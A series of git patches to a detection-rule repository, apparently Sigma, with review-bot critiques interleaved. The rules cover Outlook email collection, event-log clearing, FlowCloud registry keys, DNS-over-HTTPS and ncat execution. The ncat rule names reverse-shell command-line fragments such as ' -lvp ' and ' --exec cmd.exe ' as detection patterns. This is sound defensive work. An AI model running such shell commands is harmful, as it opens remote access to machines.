 .../powershell_suspicious_mail_acces.yml | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 rules/windows/powershell/powershell_suspicious_mail_acces.yml
diff --git a/rules/windows/powershell/powershell_suspicious_mail_acces.yml b/rules/windows/powershell/powershell_suspicious_mail_acces.yml
new file mode 100644
index 00000000..660c798a
--- /dev/null
+++ b/rules/windows/powershell/powershell_suspicious_mail_acces.yml
@@ -0,0 +1,27 @@
+title: Powershell Local Email Collection
+id: 2837e152-93c8-43d2-85ba-c3cd3c2ae614
+status: experimental
+author: frack113
+date: 2021/07/21
+description: Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md
+tags:
+ - attack.collection
+ - attack.t1114.001
+logsource:
+ product: windows
+ service: powershell
+ description: EnableScriptBlockLogging must be set to enable
+detection:
+ selection:
+ EventID: 4104
+ ScriptBlockText|contains:
+ - 'Get-Inbox.ps1'
+ - 'Microsoft.Office.Interop.Outlook'
+ - 'Microsoft.Office.Interop.Outlook.olDefaultFolders'
+ - '-comobject outlook.application'
+ condition: selection
+falsepositives:
+ - Unknown
+level: medium
From fe20158f5e0e46f8139ce906c3ce92648aaf07f5 Mon Sep 17 00:00:00 2001
From: frack113
Date: Wed, 21 Jul 2021 18:28:47 +0200
Subject: [PATCH 0032/1367] Update date and modified test
---
 rules/windows/builtin/win_susp_sdelete.yml | 2 +-
 tests/test_rules.py | 18 ++++++++++++++++++
 2 files changed, 19 insertions(+), 1 deletion(-)
diff --git a/rules/windows/builtin/win_susp_sdelete.yml b/rules/windows/builtin/win_susp_sdelete.yml
index 081c8d15..6dea5617 100644
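Review bot: The `logsource` block uses `description:` for the logging prerequisite, but the sigma key for that is `definition:` — the nishang rule earlier on this page writes `definition: It is recommended to use the new "Script Block Logging" ...` — so the line should be `definition: EnableScriptBlockLogging must be set to enable`. `'Microsoft.Office.Interop.Outlook.olDefaultFolders'` is redundant under a `contains` list that already has `'Microsoft.Office.Interop.Outlook'` and can be dropped. `'-comobject outlook.application'` on its own also fires on ordinary Outlook automation scripts, which the `falsepositives: Unknown` entry should name rather than leave open.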
--- a/rules/windows/builtin/win_susp_sdelete.yml +++ b/rules/windows/builtin/win_susp_sdelete.yml @@ -4,7 +4,7 @@ status: experimental description: Detects renaming of file while deletion with SDelete tool. author: Thomas Patzke date: 2017/06/14 -modified: 2020/08/2 +modified: 2020/08/02 references: - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm - https://www.jpcert.or.jp/english/pub/sr/ir_research.html diff --git a/tests/test_rules.py b/tests/test_rules.py index 6f4ed6f7..a53d70f0 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -277,6 +277,9 @@ class TestRules(unittest.TestCase): if not datefield: print(Fore.YELLOW + "Rule {} has no field 'date'.".format(file)) faulty_rules.append(file) + elif not isinstance(datefield, str): + print(Fore.YELLOW + "Rule {} has a malformed 'date' (should be YYYY/MM/DD).".format(file)) + faulty_rules.append(file) elif len(datefield) != 10: print(Fore.YELLOW + "Rule {} has a malformed 'date' (not 10 chars, should be YYYY/MM/DD).".format(file)) faulty_rules.append(file) 
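Review bot: The new `isinstance(datefield, str)` guard is right, but the `len(datefield) != 10` test that follows still accepts any 10-character string (`2021-07-21`, `21/07/2021`, `2021/13/40`), so a date that violates the format the message describes passes; `re.fullmatch(r"\d{4}/\d{2}/\d{2}", datefield)` (assuming `re` is available in the module) or `datetime.strptime(datefield, "%Y/%m/%d")` enforces `YYYY/MM/DD` in the same number of lines. The same length-only check is repeated in `test_date_modified` in the next hunk, so a small shared helper such as `_is_valid_rule_date(value)` would fix both at once. The enclosing test method starts outside the hunk.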
@@ -284,6 +287,21 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'date' fields. (create one, e.g. date: 2019/01/14)") + def test_date_modified(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + modifiedfield = self.get_rule_part(file_path=file, part_name="modified") + if modifiedfield: + if not isinstance(modifiedfield, str): + print(Fore.YELLOW + "Rule {} has a malformed 'modified' (should be YYYY/MM/DD).".format(file)) + faulty_rules.append(file) + elif len(modifiedfield) != 10: + print(Fore.YELLOW + "Rule {} has a malformed 'modified' (not 10 chars, should be YYYY/MM/DD).".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed 'modified' fields. (create one, e.g. date: 2019/01/14)") + def test_references(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): From 985a80de9630a4bca09c33977e574a630959fcc1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 22 Jul 2021 08:33:52 +0200 Subject: [PATCH 0033/1367] Find duplicate rules --- .../builtin/win_susp_eventlog_cleared.yml | 4 +++- .../win_susp_security_eventlog_cleared.yml | 24 ------------------- 2 files changed, 3 insertions(+), 25 deletions(-) delete mode 100644 rules/windows/builtin/win_susp_security_eventlog_cleared.yml diff --git a/rules/windows/builtin/win_susp_eventlog_cleared.yml b/rules/windows/builtin/win_susp_eventlog_cleared.yml index 2bb18452..67693faa 100644 --- a/rules/windows/builtin/win_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_susp_eventlog_cleared.yml 
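Review bot: The failure message in `test_date_modified` is copied from the date test and tells the user to `create one, e.g. date: 2019/01/14`, but a missing `modified` is accepted here (the `if modifiedfield:` guard skips it) and the remedy is to correct the `modified:` line; `"There are rules with malformed 'modified' fields (should be YYYY/MM/DD, e.g. modified: 2021/07/21)."` matches what the test checks. The nested `if modifiedfield:` / `if not isinstance(...)` reads better as one `if not modifiedfield: continue` followed by an `elif` chain, and the two print/append pairs duplicate the date test line for line, a candidate for a shared helper.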
@@ -1,6 +1,9 @@ action: global title: Eventlog Cleared id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 +related: + id: f2f01843-e7b8-4f95-a35a-d23584476423 + type: obsoletes description: One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution references: - https://twitter.com/deviouspolack/status/832535435960209408 @@ -17,7 +20,6 @@ falsepositives: - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) - System provisioning (system reset before the golden image creation) level: high - --- logsource: product: windows diff --git a/rules/windows/builtin/win_susp_security_eventlog_cleared.yml b/rules/windows/builtin/win_susp_security_eventlog_cleared.yml deleted file mode 100644 index 7485d301..00000000 --- a/rules/windows/builtin/win_susp_security_eventlog_cleared.yml +++ /dev/null @@ -1,24 +0,0 @@ -title: Security Eventlog Cleared -id: f2f01843-e7b8-4f95-a35a-d23584476423 -description: Some threat groups tend to delete the local 'Security' Eventlog using certain utitlities -tags: - - attack.defense_evasion - - attack.t1070 # an old one - - attack.t1070.001 - - car.2016-04-002 -author: Florian Roth -date: 2017/02/19 -modified: 2020/08/23 -logsource: - product: windows - service: security -detection: - selection: - EventID: - - 517 - - 1102 - condition: selection -falsepositives: - - Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog) - - System provisioning (system reset before the golden image creation) -level: high From 3c85bba9981f311da074ec42bf6fd3ce0737f8f9 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Thu, 15 Jul 2021 11:21:34 +0200 Subject: [PATCH 0034/1367] fix: according to the reference the condition should be or; it would never match otherwise anyways --- rules/windows/malware/win_mal_flowcloud.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) 
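Review bot: The `related: type: obsoletes` link is the right way to retire `f2f01843-e7b8-4f95-a35a-d23584476423`, but the hunk does not show the global rule's logsource sections, so it cannot be verified from here that the retired rule's coverage — `service: security` with `EventID` 517 and 1102 — survives in `win_susp_eventlog_cleared.yml`; if the remaining sections only cover the System channel, deleting the security rule silently loses detection of a cleared Security log. The deleted rule also carried `attack.t1070.001` and `car.2016-04-002` tags that should be present on the surviving rule. A comment under `related:`, `# replaces win_susp_security_eventlog_cleared.yml (security channel, EventID 517/1102)`, would document what was consolidated.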
diff --git a/rules/windows/malware/win_mal_flowcloud.yml b/rules/windows/malware/win_mal_flowcloud.yml index 95a72af5..9dfb9f06 100644 --- a/rules/windows/malware/win_mal_flowcloud.yml +++ b/rules/windows/malware/win_mal_flowcloud.yml @@ -9,6 +9,7 @@ tags: - attack.persistence - attack.t1112 date: 2020/06/09 +modified: 2021/07/15 logsource: product: windows category: registry_event @@ -24,7 +25,7 @@ detection: - 'HKLM\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303}' - TargetObject|startswith: - 'HKLM\SYSTEM\Setup\PrintResponsor\' - condition: selection and selection2 + condition: selection or selection2 falsepositives: - Unknown level: critical From e4880169d322cd997a4f41f078301957aba54470 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Fri, 16 Jul 2021 11:31:23 +0200 Subject: [PATCH 0035/1367] add sysmon_status and sysmon_error category to thor logsources --- tools/config/thor.yml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) diff --git a/tools/config/thor.yml b/tools/config/thor.yml index e17bc140..1568816d 100644 --- a/tools/config/thor.yml +++ b/tools/config/thor.yml @@ -33,6 +33,22 @@ logsources: rewrite: product: windows service: sysmon + sysmon_status1: + category: sysmon_status + product: windows + conditions: + EventID: 4 + rewrite: + product: windows + service: sysmon + sysmon_status2: + category: sysmon_status + product: windows + conditions: + EventID: 16 + rewrite: + product: windows + service: sysmon process_terminated: category: process_termination product: windows @@ -177,6 +193,14 @@ logsources: rewrite: product: windows service: sysmon + sysmon_error: + category: sysmon_error + product: windows + conditions: + EventID: 255 + rewrite: + product: windows + service: sysmon # target system configurations windows-application: product: windows From 3b5f3d8befbb4604db2926648253c926a3d8086f Mon Sep 17 00:00:00 2001 
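Review bot: `selection2` cannot match at all: `TargetObject:` and `TargetObject|startswith:` are two entries of one map, which sigma ANDs, and no value can both equal an `HKLM\HARDWARE\{...}` key and start with `HKLM\SYSTEM\Setup\PrintResponsor\`. Changing the condition to `selection or selection2` therefore does not make the rule fire on the FlowCloud keys; it makes `selection` — which, judging from the follow-up hunk later on this page, is only `EventID` 12/13 — sufficient on its own, so every registry key creation and value set alerts at `level: critical`. The fix is to split the two matchers into their own selections, `selection_keys:` holding the `TargetObject:` list and `selection_prefix:` holding `TargetObject|startswith:`, with `condition: selection and (selection_keys or selection_prefix)`. The later `win_mal_flowcloud.yml` hunk on this page (patch 0037) keeps both matchers in one map and so inherits the never-matching selection.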
From: phantinuss Date: Thu, 22 Jul 2021 10:14:54 +0200 Subject: [PATCH 0036/1367] fix: indentation --- tools/config/thor.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/tools/config/thor.yml b/tools/config/thor.yml index 1568816d..00b2725b 100644 --- a/tools/config/thor.yml +++ b/tools/config/thor.yml @@ -194,10 +194,10 @@ logsources: product: windows service: sysmon sysmon_error: - category: sysmon_error - product: windows - conditions: - EventID: 255 + category: sysmon_error + product: windows + conditions: + EventID: 255 rewrite: product: windows service: sysmon From 1cfb0e4689545e265e68a50c403eef91545246e8 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Thu, 22 Jul 2021 11:09:45 +0200 Subject: [PATCH 0037/1367] Update win_mal_flowcloud.yml --- rules/windows/malware/win_mal_flowcloud.yml | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/rules/windows/malware/win_mal_flowcloud.yml b/rules/windows/malware/win_mal_flowcloud.yml index 9dfb9f06..159ec036 100644 --- a/rules/windows/malware/win_mal_flowcloud.yml +++ b/rules/windows/malware/win_mal_flowcloud.yml @@ -9,23 +9,19 @@ tags: - attack.persistence - attack.t1112 date: 2020/06/09 -modified: 2021/07/15 +modified: 2021/07/22 logsource: product: windows category: registry_event detection: selection: - EventID: - - 12 # key create - - 13 # value set - selection2: - TargetObject: - 'HKLM\HARDWARE\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' - 'HKLM\HARDWARE\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' - 'HKLM\HARDWARE\{2DB80286-1784-48b5-A751-B6ED1F490303}' - TargetObject|startswith: - 'HKLM\SYSTEM\Setup\PrintResponsor\' - condition: selection or selection2 + condition: selection falsepositives: - Unknown level: critical From cbc7a746d4d4975bc0a243fa7152c87617648642 Mon Sep 17 00:00:00 2001 
From: Florian Roth Date: Thu, 22 Jul 2021 15:00:50 +0200 Subject: [PATCH 0038/1367] feat: some often used ncat command line strings --- .../windows/process_creation/sysmon_netcat_execution.yml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/sysmon_netcat_execution.yml b/rules/windows/process_creation/sysmon_netcat_execution.yml index 5c187881..21344091 100644 --- a/rules/windows/process_creation/sysmon_netcat_execution.yml +++ b/rules/windows/process_creation/sysmon_netcat_execution.yml @@ -18,7 +18,14 @@ detection: # can not use OriginalFileName as is empty Image|endswith: - '\ncat.exe' - condition: selection + selection_cmdline: + # Typical command lines + CommandLine|contains: + - ' -lvp ' + - ' -l --proxy-type http ' + - ' --exec cmd.exe ' + - ' -vnl --exec ' + condition: selection or selection_cmdline falsepositives: - Legitimate ncat use level: medium From c7685e1c1831080f5f34823e68a97b86d1b88713 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 11:04:15 -0500 Subject: [PATCH 0039/1367] Create sysmon_dns_over_https_enabled.yml --- .../sysmon_dns_over_https_enabled.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/registry_event/sysmon_dns_over_https_enabled.yml diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml new file mode 100644 index 00000000..777261b3 --- /dev/null +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml 
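Review bot: `selection_cmdline` matches argument fragments regardless of `Image`, so the rule now also fires on `nc.exe` or a renamed copy, but the title `Ncat Execution`, the `description` (still the generic T1095 text) and `falsepositives: Legitimate ncat use` only describe the image-name branch; the `# Typical command lines` comment could read `# ncat/nc argument patterns, matched on any image so renamed binaries are covered`. `' -lvp '` alone is the everyday listener syntax shared by every netcat variant, so that entry at `level: medium` is likely to be noisy on administrative hosts; the `falsepositives` and `level` lines close the hunk.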
@@ -0,0 +1,28 @@ +title: DNS-over-HTTPS Enabled by Registry +id:04b45a8a-d11d-49e4-9acc-4a1b524407a5 +description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. +author: Austin Songer +status: experimental +references: + - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html + - https://github.com/elastic/detection-rules/issues/1371 + - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode +tags: + - attack.defense_evasion + - attack.t1140 +logsource: + product: windows + category: registry_event +detection: + selection1: + TargetObject: + - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' + Details: 'DWORD (1)' + selection2: + TargetObject: + - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' + Details: 'DWORD (secure)' + condition: selection1 or selection2 +falsepositives: +- "Unlikely" +level: "medium" From edf1740ec4e2d1ffaf729f7b523cb04902da9977 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 11:05:31 -0500 Subject: [PATCH 0040/1367] Update sysmon_dns_over_https_enabled.yml --- .../windows/registry_event/sysmon_dns_over_https_enabled.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index 777261b3..feb47971 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml 
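Review bot: The `TargetObject` values use the `HKEY_LOCAL_MACHINE\` prefix, but Sysmon registry events (what `category: registry_event` maps to) report the hive as `HKLM\`, as the other registry rule on this page does with `'HKLM\HARDWARE\...'` in win_mal_flowcloud.yml, so neither selection can match; change each to `HKLM\SOFTWARE\...`. The same prefix is carried into the Firefox `selection3` that PATCH 0045 adds, so fix it there as well. `Details: 'DWORD (secure)'` also looks wrong: Chrome's `DnsOverHttpsMode` policy is a string value (`secure`/`automatic`/`off`), so Sysmon would log the bare string rather than a `DWORD (...)` rendering — confirm against a captured event before relying on it. A comment beside `selection1` noting what `BuiltInDnsClientEnabled` actually toggles, e.g. `# Edge: built-in resolver switch, see references`, would help readers judge how directly this key implies DoH being enabled.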
@@ -17,11 +17,11 @@ detection: selection1: TargetObject: - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' - Details: 'DWORD (1)' + Details: 'DWORD (1)' selection2: TargetObject: - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' - Details: 'DWORD (secure)' + Details: 'DWORD (secure)' condition: selection1 or selection2 falsepositives: - "Unlikely" From 6e8df1e9d23d2a9ff4d45d652b26eb26a4e30758 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 11:05:54 -0500 Subject: [PATCH 0041/1367] Update sysmon_dns_over_https_enabled.yml --- .../windows/registry_event/sysmon_dns_over_https_enabled.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index feb47971..3ca50cef 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -6,10 +6,10 @@ status: experimental references: - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html - https://github.com/elastic/detection-rules/issues/1371 - - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode + - https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode tags: - attack.defense_evasion - - attack.t1140 + - attack.t1140 logsource: product: windows category: registry_event From d093fea6a5a98ae2e61072b270ec2382e5f1a34a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 11:07:02 -0500 Subject: [PATCH 0042/1367] Update sysmon_dns_over_https_enabled.yml --- .../windows/registry_event/sysmon_dns_over_https_enabled.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index 3ca50cef..fa4c8a6c 100644 
--- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -17,11 +17,11 @@ detection: selection1: TargetObject: - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\BuiltInDnsClientEnabled' - Details: 'DWORD (1)' + Details: 'DWORD (1)' selection2: TargetObject: - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' - Details: 'DWORD (secure)' + Details: 'DWORD (secure)' condition: selection1 or selection2 falsepositives: - "Unlikely" From 4ddcea0714219006208c659a028687c9fc0003a2 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 11:09:41 -0500 Subject: [PATCH 0043/1367] Update sysmon_dns_over_https_enabled.yml --- rules/windows/registry_event/sysmon_dns_over_https_enabled.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index fa4c8a6c..bc22e026 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -10,6 +10,7 @@ references: tags: - attack.defense_evasion - attack.t1140 + - attack.t1112 logsource: product: windows category: registry_event From 44630b215ec94e9ab1e3b0c373a075b3d61f1ede Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 11:22:56 -0500 Subject: [PATCH 0044/1367] Update sysmon_dns_over_https_enabled.yml --- rules/windows/registry_event/sysmon_dns_over_https_enabled.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index bc22e026..c8b48d6a 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml 
@@ -1,5 +1,5 @@ title: DNS-over-HTTPS Enabled by Registry -id:04b45a8a-d11d-49e4-9acc-4a1b524407a5 +id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5 description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. author: Austin Songer status: experimental From 2929f8915e01377785485e89858e8d64bfbdeb11 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 11:27:41 -0500 Subject: [PATCH 0045/1367] Update sysmon_dns_over_https_enabled.yml --- .../registry_event/sysmon_dns_over_https_enabled.yml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index c8b48d6a..34ee8df0 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -23,7 +23,11 @@ detection: TargetObject: - 'HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\DnsOverHttpsMode' Details: 'DWORD (secure)' - condition: selection1 or selection2 + selection3: + TargetObject: + - 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Mozilla\Firefox\DNSOverHTTPS' + Details: 'DWORD (1)' + condition: selection1 or selection2 or selection3 falsepositives: - "Unlikely" level: "medium" From aff52640969aaa788860f4673911281b1757d577 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 22 Jul 2021 19:25:51 +0200 Subject: [PATCH 0046/1367] Add check for status and level --- .../powershell_suspicious_mail_acces.yml | 2 +- tests/test_rules.py | 28 +++++++++++++++++++ 2 files changed, 29 insertions(+), 1 deletion(-) 
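Review bot: The new `selection3` requires `TargetObject` to equal `...\Policies\Mozilla\Firefox\DNSOverHTTPS`, but in the Firefox policy templates `DNSOverHTTPS` is a key whose switch is the `Enabled` value beneath it, so a Sysmon value-set event would carry a TargetObject ending in `\DNSOverHTTPS\Enabled` and never equal this string — confirm against the template and append `\Enabled` (or switch to `TargetObject|endswith`). The `HKEY_LOCAL_MACHINE\` prefix here also differs from the `HKLM\` form Sysmon emits and that the other registry rule on this page uses.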
diff --git a/rules/windows/powershell/powershell_suspicious_mail_acces.yml b/rules/windows/powershell/powershell_suspicious_mail_acces.yml index 660c798a..13210d4a 100644 --- a/rules/windows/powershell/powershell_suspicious_mail_acces.yml +++ b/rules/windows/powershell/powershell_suspicious_mail_acces.yml @@ -12,7 +12,7 @@ tags: logsource: product: windows service: powershell - description: EnableScriptBlockLogging must be set to enable + definition: EnableScriptBlockLogging must be set to enable detection: selection: EventID: 4104 diff --git a/tests/test_rules.py b/tests/test_rules.py index a53d70f0..1e1cec92 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py 
@@ -302,6 +302,34 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed 'modified' fields. (create one, e.g. date: 2019/01/14)") + def test_optional_status(self): + faulty_rules = [] + valid_status = ["stable","test","experimental"] + for file in self.yield_next_rule_file_path(self.path_to_rules): + status_str = self.get_rule_part(file_path=file, part_name="status") + if status_str: + if not status_str in valid_status: + print(Fore.YELLOW + "Rule {} has a invalide 'status' (check wiki).".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with malformed 'status' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + + def test_level(self): + faulty_rules = [] + valid_level = ["informational","low","medium","high","critical"] + for file in self.yield_next_rule_file_path(self.path_to_rules): + level_str = self.get_rule_part(file_path=file, part_name="level") + if not level_str: + print(Fore.YELLOW + "Rule {} has no field 'level'.".format(file)) + faulty_rules.append(file) + elif not level_str in valid_level: + print(Fore.YELLOW + "Rule {} has a invalide 'level' (check wiki).".format(file)) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + + "There are rules with missing or malformed 'level' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") + def test_references(self): faulty_rules = [] for file in self.yield_next_rule_file_path(self.path_to_rules): From d7783ea9d7bdae29a4f06595a6b4c45c719d8839 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 12:42:53 -0500 Subject: [PATCH 0047/1367] Update sysmon_dns_over_https_enabled.yml --- .../windows/registry_event/sysmon_dns_over_https_enabled.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) 
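Review bot: `if not status_str in valid_status` and `if not level_str in valid_level` should read `if status_str not in valid_status` / `if level_str not in valid_level`, and both messages misspell the word (`has a invalide` → `has an invalid`). Beyond that, `test_optional_status` and `test_level` are the same iterate-and-validate loop differing only in field name, allowed values and whether the field is required, so the loop belongs in one private helper that both tests call, as sketched below. `valid_status` is hard-coded to three values while the linked Specification page is the authority on the allowed set, so confirm the list against it before this check lands. The enclosing `TestRules` class continues outside the hunk.
```python
    def _check_rule_field(self, part_name, valid_values, required):
        """Return the rule files whose `part_name` is missing (if required) or not in `valid_values`."""
        faulty_rules = []
        for file in self.yield_next_rule_file_path(self.path_to_rules):
            value = self.get_rule_part(file_path=file, part_name=part_name)
            if not value:
                if required:
                    print(Fore.YELLOW + "Rule {} has no field '{}'.".format(file, part_name))
                    faulty_rules.append(file)
            elif value not in valid_values:
                print(Fore.YELLOW + "Rule {} has an invalid '{}' (check wiki).".format(file, part_name))
                faulty_rules.append(file)
        return faulty_rules

    def test_optional_status(self):
        faulty_rules = self._check_rule_field("status", ["stable", "test", "experimental"], required=False)
        self.assertEqual(faulty_rules, [], Fore.RED +
                         "There are rules with malformed 'status' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)")

    def test_level(self):
        faulty_rules = self._check_rule_field("level", ["informational", "low", "medium", "high", "critical"], required=True)
        self.assertEqual(faulty_rules, [], Fore.RED +
                         "There are rules with missing or malformed 'level' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)")
    # … unchanged: test_references …
```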
diff --git a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml index 34ee8df0..e3ba5eb6 100644 --- a/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml +++ b/rules/windows/registry_event/sysmon_dns_over_https_enabled.yml @@ -1,5 +1,6 @@ title: DNS-over-HTTPS Enabled by Registry id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5 +date: 2021/07/22 description: Detects when a user enables DNS-over-HTTPS. This can be used to hide internet activity or be used to hide the process of exfiltrating data. With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. author: Austin Songer status: experimental @@ -29,5 +30,5 @@ detection: Details: 'DWORD (1)' condition: selection1 or selection2 or selection3 falsepositives: -- "Unlikely" -level: "medium" +- Unlikely +level: medium From 3f6e700547e7afe65061fe1b666609d80418cb89 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 21:39:33 -0500 Subject: [PATCH 0048/1367] Create aws_route_53_domain_transferred_to_another_account.yml --- ..._domain_transferred_to_another_account.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/aws_route_53_domain_transferred_to_another_account.yml diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml new file mode 100644 index 00000000..8fb1ff59 --- /dev/null +++ b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml 
@@ -0,0 +1,22 @@ +title: "AWS Route 53 Domain Transferred to Another Account" +description: "Identifies when a request has been made to transfer a Route 53 domain to another AWS account." +author: Elastic, Austin Songer +status: experimental +date: 2021/07/22 +reference: + - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml +logsource: + service: cloudtrail +detection: + selection_source: + - eventSource: route53.amazonaws.com + selection_eventname: + - eventName: TransferDomainToAnotherAwsAccount + condition: all of them +tags: + - attack.persistence + - attack.credential_access + - attack.t1098 +falsepositives: +- A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low From 019764f83f80f0cef7d0ca608dea35dcb73dd9dd Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 22 Jul 2021 21:40:05 -0500 Subject: [PATCH 0049/1367] Update aws_route_53_domain_transferred_to_another_account.yml --- ...aws_route_53_domain_transferred_to_another_account.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml b/rules/cloud/aws_route_53_domain_transferred_to_another_account.yml index 8fb1ff59..9dd6a0f3 100644 --- 